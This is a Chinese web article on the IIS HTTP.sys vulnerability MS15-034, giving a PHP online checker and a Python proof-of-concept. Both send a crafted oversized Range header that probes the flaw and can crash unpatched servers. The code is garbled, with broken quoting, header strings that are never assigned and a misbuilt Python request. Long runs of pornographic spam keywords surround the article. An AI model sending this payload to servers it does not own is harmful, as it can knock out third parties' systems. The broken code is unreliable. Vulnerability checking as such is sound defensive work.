精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

IIS最新高危漏洞POC及在線檢測源碼

安全 漏洞
遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。

HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)

IIS最新高危漏洞POC及在線檢測源碼

遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。https://technet.microsoft.com/zh-cn/library/security/MS15-034

在線檢測源碼

IIS最新高危漏洞POC及在線檢測源碼 

  1. <?php 
  2.  
  3.  
  4. class VulnStatus  
  5. {  
  6. const FAIL        = 0;  
  7. const VULN        = 1;  
  8. const VULN_NOT_MS = 2;  
  9. const PATCHED     = 3;  
  10. const NOT_VULN    = 4;  
  11. const NOT_VULN_MS = 5;  
  12. const NOT_VULN_CF = 6;  
  13.  
  14. public static function AsString( $status, $host )  
  15. {  
  16. switch( $status )  
  17. {  
  18. case self::FAIL       : return ';<div class="alert alert-warning">無法連接到 <b>'; . $host . ';</b> 測試漏洞。</div>';;  
  19. case self::VULN       : return ';<div class="alert alert-danger"><b>'; . $host . ';</b> 存在漏洞。</div>';;  
  20. case self::VULN_NOT_MS: return ';<div class="alert alert-warning"><b>'; . $host . ';</b> 可能存在漏洞,但它好像沒使用IIS。</div>';;  
  21. case self::PATCHED    : return ';<div class="alert alert-success"><b>'; . $host . ';</b> 已修復。</div>';;  
  22. case self::NOT_VULN   : return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>, 并沒有使用IIS,可能不存在漏洞。</div>';;  
  23. case self::NOT_VULN_MS: return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>. 可能不存在漏洞。</div>';;  
  24. case self::NOT_VULN_CF: return ';<div class="alert alert-success"><b>'; . $host . ';</b> 可能使用了CloudFlare CDN加速,導致漏洞無法檢測或不存在。</div>';;  
  25. }  
  26.  
  27. return ';好像壞了';;  
  28. }  
  29. }  
  30.  
  31. $host = false;  
  32. $status = false;  
  33. $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL );  
  34.  
  35. if( !empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )  
  36. {  
  37. $url = ';http://'; . $url;  
  38. }  
  39.  
  40. $port = parse_url( $url, PHP_URL_PORT );  
  41.  
  42. if( $port === null )  
  43. {  
  44. $port = 80;  
  45. }  
  46.  
  47. $url = parse_url( $url, PHP_URL_HOST );  
  48.  
  49. if( $url !== null )  
  50. {  
  51. $cachekey = ';ms15034_'; . $url . ';_'; . $port;  
  52. $cachetime = 300; // 5 minutes  
  53.  
  54. $host = htmlspecialchars( $url, ENT_HTML5 );  
  55.  
  56. if( $port !== 80 )  
  57. {  
  58. $host .';:'; . $port;  
  59. }  
  60.  
  61. $memcached = new Memcached( );  
  62. $memcached->addServer( ';/var/run/memcached/memcached.sock';, 0 );  
  63.  
  64. $status = $memcached->get( $cachekey );  
  65.  
  66. if( $status === false )  
  67. {  
  68. $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );  
  69.  
  70. if( $fp === false )  
  71. {  
  72. $status = VulnStatus::FAIL;  
  73. }  
  74. else  
  75. {  
  76. stream_set_timeout( $fp, 5 );  
  77.  
  78. $header = "GET / HTTP/1.1\r\n";  
  79. $header ."Host: stuff\r\n";  
  80. $header ."Range: bytes=0-18446744073709551615\r\n";  
  81. $header ."Connection: close\r\n\r\n";  
  82.  
  83. fwrite( $fp, $header );  
  84.  
  85. $response = fread( $fp, 1024 );  
  86.  
  87. fclose( $fp );  
  88.  
  89. if( strpos( $response, ';您的請求范圍不符合'; ) !== false )  
  90. {  
  91. $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;  
  92. }  
  93. else if( strpos( $response, ';請求一個無效的header頭部'; ) !== false )  
  94. {  
  95. $cachetime = 3600; // 緩存時間  
  96. $status = VulnStatus::PATCHED;  
  97. }  
  98. else if( strpos( $response, ';Microsoft'; ) === false )  
  99. {  
  100. if( strpos( $response, ';403 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false )  
  101. {  
  102. $status = VulnStatus::NOT_VULN_CF;  
  103. }  
  104. else  
  105. {  
  106. $status = VulnStatus::NOT_VULN;  
  107. }  
  108. }  
  109. else  
  110. {  
  111. $status = VulnStatus::NOT_VULN_MS;  
  112. }  
  113. }  
  114.  
  115. unset( $fp, $header, $response );  
  116.  
  117. $memcached->set( $cachekey, $status, $cachetime );  
  118. }  
  119.  
  120. $status = VulnStatus::AsString( $status, $host );  
  121. }  
  122. ?> 
  123. <!DOCTYPE HTML> 
  124. <html> 
  125. <head> 
  126. <meta charset="utf-8"> 
  127. <meta name="theme-color" content="#424242"> 
  128. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
  129. <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  130.  
  131. <title>MS15-034 測試</title> 
  132.  
  133. <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet"> 
  134.  
  135. <style type="text/css"> 
  136. .container {  
  137. max-width: 900px;  
  138. }  
  139.  
  140. .masthead {  
  141. position: relative;  
  142. padding: 20px 0;  
  143. text-align: center;  
  144. color: #fff;  
  145. background-color: #424242;  
  146. margin-bottom: 20px;  
  147. }  
  148.  
  149. .masthead a {  
  150. color: #fff;  
  151. }  
  152.  
  153. .footer {  
  154. text-align: center;  
  155. padding: 15px;  
  156. color: #555;  
  157. }  
  158.  
  159. .footer span {  
  160. color: #FA5994;  
  161. }  
  162.  
  163. .form-inline {  
  164. text-align: center;  
  165. margin-bottom: 20px;  
  166. }  
  167.  
  168. .github {  
  169. position: absolute;  
  170. top: 0;  
  171. right: 0;  
  172. }  
  173. </style> 
  174. </head> 
  175. <body> 
  176. <div> 
  177. <div> 
  178. <h1>HTTP.sys 堆棧漏洞測試</h1> 
  179. <h3>輸入一個URL或主機名來測試服務器的 <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</h3> 
  180. </div> 
  181. </div> 
  182.  
  183.  
  184.  
  185. <div> 
  186. <blockquote> 
  187. <p>在HTTP協議棧(HTTP.sys)造成當HTTP協議堆棧不正確地分析特制的HTTP請求的遠程代碼執行漏洞。成功利用此漏洞誰的攻擊者可以在系統帳戶的上下文中執行任意代碼。</p> 
  188. <p>要利用此漏洞,攻擊者必須發送一個特制的HTTP請求發送到受影響的系統。此更新通過修改Windows HTTP協議棧處理請求解決該漏洞。</p> 
  189. </blockquote> 
  190.  
  191. <form id="js-form" method="GET"> 
  192. <div> 
  193. <input type="text" class="form-control input-lg" id="js-input" placeholder="baidu.com" name="host" autofocus<?php if( $host !== false ) { echo '; value="'; . $host . ';"';; } ?>> 
  194. <button type="submit" class="btn btn-primary btn-lg">檢測</button> 
  195. </div> 
  196. </form> 
  197.  
  198. <?php if( $status !== false ) { echo $status; } ?> 
  199.  
  200. <div>使用Memcached分布式內存對象緩存系統 | 所有的結果查詢會被緩存五分鐘</div> 
  201. </div> 
  202. </body> 
  203. </html> 

漏洞驗證POC

python版

  1. #!/usr/bin/env python  
  2. __author__ = ';jastra';  
  3. class bg_colors:  
  4.     VULN = ';33[92m';  
  5.     NONVULN= ';33[95m';  
  6.     EXPLOIT = ';33[91m';    
  7. try:  
  8.     import requests  
  9.     import re  
  10. except ImportError as ierr:  
  11.     print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)  
  12.       
  13. def identify_iis(domain):  
  14.     req = requests.get(str(domain))  
  15.     remote_server = req.headers[';server';]  
  16.           
  17.     if "Microsoft-IIS" in remote_server:  
  18.         print(bg_colors.VULN + "[+] 服務是 " + remote_server)   
  19.         ms15_034_test(str(domain))  
  20.     else:  
  21.         print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)   
  22.           
  23. def ms15_034_test(domain):  
  24.     print(" 啟動vuln檢查!")  
  25.     vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";  
  26.     req = requests.get(str(domain), params=vuln_buffer)  
  27.     if req.headers[';content';] == "請求范圍不符合":  
  28.         print(bg_colors.EXPLOIT + "[+] 存在漏洞")  
  29.     else:  
  30.         print(bg_colors.EXPLOIT + "[-] IIS服務無法顯示漏洞是否存在. "+  
  31.                "需要手動檢測")  
  32. usr_domain = raw_input("輸入域名掃描: ")  
  33. identify_iis(usr_domain) 

 

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2009-02-04 11:24:12

2015-07-13 09:18:20

2022-03-09 13:25:21

臟管道Linux 內核漏洞

2011-03-21 10:46:04

2013-07-18 15:09:27

2022-05-27 12:51:46

漏洞VMware攻擊者

2013-07-11 09:25:49

2025-09-18 10:05:45

2023-11-08 13:34:13

2025-09-08 10:04:46

2020-03-25 09:40:57

微軟瀏覽器Windows

2021-11-10 11:51:33

BrakTooth安全漏洞藍牙設備

2023-04-07 09:12:11

2012-03-12 17:23:45

2025-01-02 14:21:20

2020-11-04 14:55:06

谷歌GitHub漏洞

2023-04-12 21:28:40

2011-08-15 15:41:29

2015-04-22 16:06:23

社保信息泄漏

2016-11-08 19:44:08

點贊
收藏

51CTO技術棧公眾號

日韩精品影视| 吉吉日韩欧美| 国产高清久久久| 久久久久久91| 日韩中文字幕有码| 韩国三级大全久久网站| 亚洲成人福利片| 日韩精品一区二区三区外面| av免费在线不卡| 国产精品日本| 久久久精品影院| 亚洲一区二区在线免费| 无人区在线高清完整免费版 一区二 | 91欧美一区二区| 国产女人18毛片水18精品| 久久久久久久9999| 国产成人黄色| 精品奇米国产一区二区三区| 91激情视频在线| 性欧美videoshd高清| 91丨九色丨尤物| 91色在线观看| 成人小视频在线播放| 欧美涩涩网站| 日韩中文字幕视频| 中出视频在线观看| 欧州一区二区三区| 欧美视频一区二区| 国产在线播放观看| 黄黄的网站在线观看| 久久久国产一区二区三区四区小说| 成人午夜小视频| 国产精品免费无遮挡无码永久视频| 欧美日韩精品一本二本三本 | 这里只有久久精品| 凹凸av导航大全精品| 91精品国产综合久久小美女| 亚洲性生活网站| 中文字幕在线看片| 亚洲成人自拍一区| av动漫在线免费观看| 日韩欧美小视频| 久久久青草青青国产亚洲免观| 99热99热| jizz中国少妇| 国产一区二区福利| 成人黄色免费在线观看| 夜夜躁很很躁日日躁麻豆| 中文日韩欧美| 欧美伊久线香蕉线新在线| 国产黄色片视频| 欧美激情1区2区| 久久福利网址导航| 国产免费无码一区二区视频| 日韩大片在线观看| 夜夜嗨av色综合久久久综合网| 五月婷婷综合在线观看| 日韩成人一级| 亚洲男人天堂久| www.久久国产| 自拍偷拍精品| 这里只有精品在线播放| 老司机福利在线观看| 成人三级视频| 久久福利视频网| 久草视频在线资源| 亚洲精品九九| 4k岛国日韩精品**专区| 欧美激情黑白配| 石原莉奈在线亚洲二区| 国产精品久久久久久久久| 最近国语视频在线观看免费播放| 蜜桃精品视频在线| 91最新在线免费观看| 国产福利小视频| 不卡影院免费观看| 欧美精品v日韩精品v国产精品| 成人在线观看一区| 中文字幕中文字幕一区| 综合视频在线观看| 国产一线二线在线观看| 欧美性猛交xxxx富婆| 精品少妇无遮挡毛片| 成人av在线播放| 亚洲国产精品大全| 亚洲自拍偷拍图| 亚洲色图网站| 国产69久久精品成人| 性色av一区二区三区四区| 国产中文字幕精品| 国产一区二区三区高清视频| 国产高清视频免费最新在线| 亚洲女人的天堂| 精品这里只有精品| 日韩色性视频| 欧美mv和日韩mv国产网站| 人人妻人人澡人人爽人人精品| 日韩av片子| 久久久久亚洲精品成人网小说| 伊人中文字幕在线观看| 韩国成人福利片在线播放| 含羞草久久爱69一区| av黄色在线观看| 亚洲国产成人91porn| 天堂在线资源视频| 91亚洲无吗| 中文字幕亚洲天堂| 欧美亚韩一区二区三区| 狠狠色狠狠色综合系列| 蜜桃麻豆91| 在线看福利影| 日本道精品一区二区三区| 欧美体内she精高潮| 精品视频国产| 国内成人精品一区| 国产片高清在线观看| 91免费国产视频网站| 男同互操gay射视频在线看| 中文字幕色婷婷在线视频 | 日韩精品视频无播放器在线看| 国产精品久久看| 黄色影院一级片| 日韩精品免费视频一区二区三区 | mm1313亚洲国产精品美女| 一道本成人在线| 国产一精品一aⅴ一免费| 99久久亚洲精品蜜臀| 日本欧美中文字幕| 六月婷婷综合网| 国产精品久久久久三级| 黑森林福利视频导航| 亚洲国产精品免费视频| 色偷偷偷亚洲综合网另类| 欧美日韩乱国产| 成人爱爱电影网址| 欧美性猛交内射兽交老熟妇| 亚洲精品伦理| 亚洲新声在线观看| 国产成人在线视频观看| kk眼镜猥琐国模调教系列一区二区| 黄色免费高清视频| 欧洲午夜精品| 一本色道久久88综合亚洲精品ⅰ | 欧美 日韩 国产在线| xxx性欧美| 亚洲精品在线观| 久久久久久久久久综合| 国内精品伊人久久久久av影院| 亚洲一区二区精品在线观看| 日韩毛片一区| 中文字幕欧美亚洲| 亚洲系列第一页| 国产精品欧美久久久久无广告| 爱情岛论坛成人| 精品毛片免费观看| 国产精品天天狠天天看| 一区二区三区视频在线观看视频| 欧美三区在线观看| 天堂а√在线中文在线鲁大师| 久久精品国产77777蜜臀| 在线视频一区观看| 久久69av| 久久免费视频在线观看| 天天摸天天碰天天爽天天弄| 婷婷成人激情在线网| 制服丝袜第二页| 日韩精品91亚洲二区在线观看| 日韩在线三区| 综合久久av| 欧美黑人一区二区三区| 色哟哟国产精品色哟哟| 色婷婷久久久综合中文字幕| 免费观看a级片| 黄色日韩网站视频| 欧美日韩福利在线| 亚洲人成网77777色在线播放 | 美女一区2区| 日韩女优人人人人射在线视频| 国产二区在线播放| 欧美精品久久99| 国产福利久久久| 26uuu久久天堂性欧美| 亚洲77777| 欧美88av| 欧美日韩在线一二三| 亚洲美女色播| 91av视频在线播放| 日本高清视频在线播放| 日韩美女视频一区二区在线观看| 亚洲视频免费播放| 国产精品午夜春色av| 性生交大片免费看l| 国产精品乱看| 最新黄色av网站| 亚州av一区| 91久久国产婷婷一区二区| www视频在线观看| 这里精品视频免费| 天堂在线观看视频| 欧美日韩亚洲另类| 日韩av大片在线观看| 亚洲视频免费在线| 亚洲熟妇一区二区三区| 国产精品一区久久久久| 亚洲色精品三区二区一区| 欧美激情五月| 亚洲欧洲精品一区二区三区波多野1战4 | 欧美视频中文字幕| 久久精品视频8| 国产精品对白交换视频| aaaaa一级片| 成人免费看视频| 亚洲三级在线观看视频| 国产人成精品一区二区三| 亚洲精品偷拍视频| 日本a口亚洲| 欧美日韩国产高清视频| 亚洲精品在线a| 国产伊人精品在线| 日韩免费va| 668精品在线视频| 日韩另类在线| 久久精品中文字幕| aaa日本高清在线播放免费观看| 精品国内二区三区| jizz国产视频| 91精品国产免费| 中文字幕在线观看免费| 一本久久a久久精品亚洲| 国产污视频在线观看| 一区二区三区免费在线观看| 天堂а√在线中文在线鲁大师| 国产片一区二区| 蜜臀久久99精品久久久久久| 91麻豆123| 亚洲一区二区三区四区五区六区| 丰满亚洲少妇av| 中文在线字幕观看| 国产成人在线看| 欧美国产在线一区| 精品一区二区三区在线观看国产| 日日噜噜噜噜久久久精品毛片| 男人的天堂亚洲在线| 777精品久无码人妻蜜桃| 亚洲精品少妇| 鲁一鲁一鲁一鲁一色| 夜夜夜久久久| 国产日韩一区二区在线| 免费在线观看成人av| 丰满人妻中伦妇伦精品app| 国产精品久久久久久久免费软件 | 久久av影院| 国产精品私拍pans大尺度在线| 黄色成人小视频| 成人激情视频在线| 日韩欧美久久| 国产乱码精品一区二区三区不卡| 成功精品影院| 久精品国产欧美| 国产精品一线天粉嫩av| 日韩精品最新在线观看| 久久影视一区| 国产经典久久久| 红桃视频国产精品| 水蜜桃色314在线观看| 性欧美暴力猛交另类hd| 国产自偷自偷免费一区| 另类小说综合欧美亚洲| 中文字幕一区二区在线观看视频 | 精品一区二区三区蜜桃| 在线a免费观看| aaa亚洲精品| 国产全是老熟女太爽了| 国产精品欧美久久久久一区二区| 日本精品在线免费观看| 亚洲国产视频直播| 69亚洲精品久久久蜜桃小说| 欧美日韩国产小视频在线观看| av免费观看网址| 精品伊人久久97| 尤物网在线观看| 久久国产精彩视频| 午夜不卡影院| 成人免费观看网址| 精品国产乱子伦一区二区| 日本午夜一区二区三区| 亚洲精品97| 久久精品免费一区二区| 久久精品国产99久久6| 影音先锋黄色资源| 国产精品视频看| 精品处破女学生| 欧洲精品一区二区| 亚洲精品久久久久久动漫器材一区 | 一本色道综合亚洲| 国产男女无套免费网站| 亚洲精品久久久久久久久久久久| av电影在线播放高清免费观看| 欧美老女人在线视频| 国产精品极品美女在线观看| av在线不卡一区| 成人无号精品一区二区三区| 国产主播自拍av| 激情久久五月天| 熟女俱乐部一区二区| 一区二区三区在线高清| 无码日韩精品一区二区| 欧美大片在线观看一区二区| 草草影院在线观看| 午夜精品久久久久久99热软件| av一级久久| 日韩激情久久| 国产欧美精品| 久久精品aⅴ无码中文字字幕重口| 欧美激情中文不卡| 99热只有这里有精品| 欧美一区二区在线视频| 福利片在线看| 97成人在线视频| 国产乱论精品| 欧美黄网在线观看| 久久福利视频一区二区| 国产精品无码一区二区三区| 亚洲一区av在线| 国产精品人妻一区二区三区| 一区国产精品视频| 青青青免费在线视频| av成人午夜| 中文精品久久| 日本高清一区二区视频| 国产精品三级av| www.久久网| 国产一区二区三区精品久久久 | 亚洲高清网站| 超级砰砰砰97免费观看最新一期 | 国产亚洲精品久久久| 国产直播在线| 国产在线一区二区三区欧美| 精品91在线| 成人在线电影网站| 亚洲国产你懂的| 丰满熟妇乱又伦| 欧美激情视频在线| 色播一区二区| 欧美少妇一区二区三区| 国产做a爰片久久毛片| 亚洲 欧美 国产 另类| 欧美日韩视频一区二区| 日本最黄一级片免费在线| 国产欧美在线视频| 99久久久久久中文字幕一区| 精品综合久久久久| 亚洲欧洲日产国产综合网| 91精品国自产| 欧美国产日韩一区二区在线观看| 日韩中文字幕无砖| 久久久久久久久久网| av一区二区久久| 国产农村妇女aaaaa视频| 国产午夜精品美女视频明星a级| **欧美日韩在线观看| 一级做a爰片久久| 激情综合网激情| 久久久久久久久久综合| 亚洲第一区在线观看| 竹内纱里奈兽皇系列在线观看| 欧美日韩日本网| 另类小说视频一区二区| 九九精品在线观看视频| 日韩精品免费在线播放| 色综合一本到久久亚洲91| 一区二区三区欧美在线| 国产成人综合在线| 91av在线免费视频| 亚洲无线码在线一区观看| 91精品一区| 免费一级特黄特色毛片久久看| 久久久一区二区三区捆绑**| 一级片在线观看视频| 欧美激情网友自拍| 伊人成综合网yiren22| 亚洲一级片网站| 亚洲一区二区在线免费看| 国产在线观看免费| 91午夜在线播放| 一区二区三区精品视频在线观看 | 91精品综合久久久久久久久久久| 国产又粗又猛又爽又黄| 狠狠做深爱婷婷久久综合一区| yw视频在线观看| 超碰97人人在线| 日本特黄久久久高潮| 久久久久久久久久久久久久免费看| 亚洲欧美国内爽妇网| 国产一区二区三区免费在线| 欧美亚洲一二三区| 亚洲精品欧美激情| 成人性生交大片免费看午夜| av一区二区三区四区电影| 日韩极品在线观看|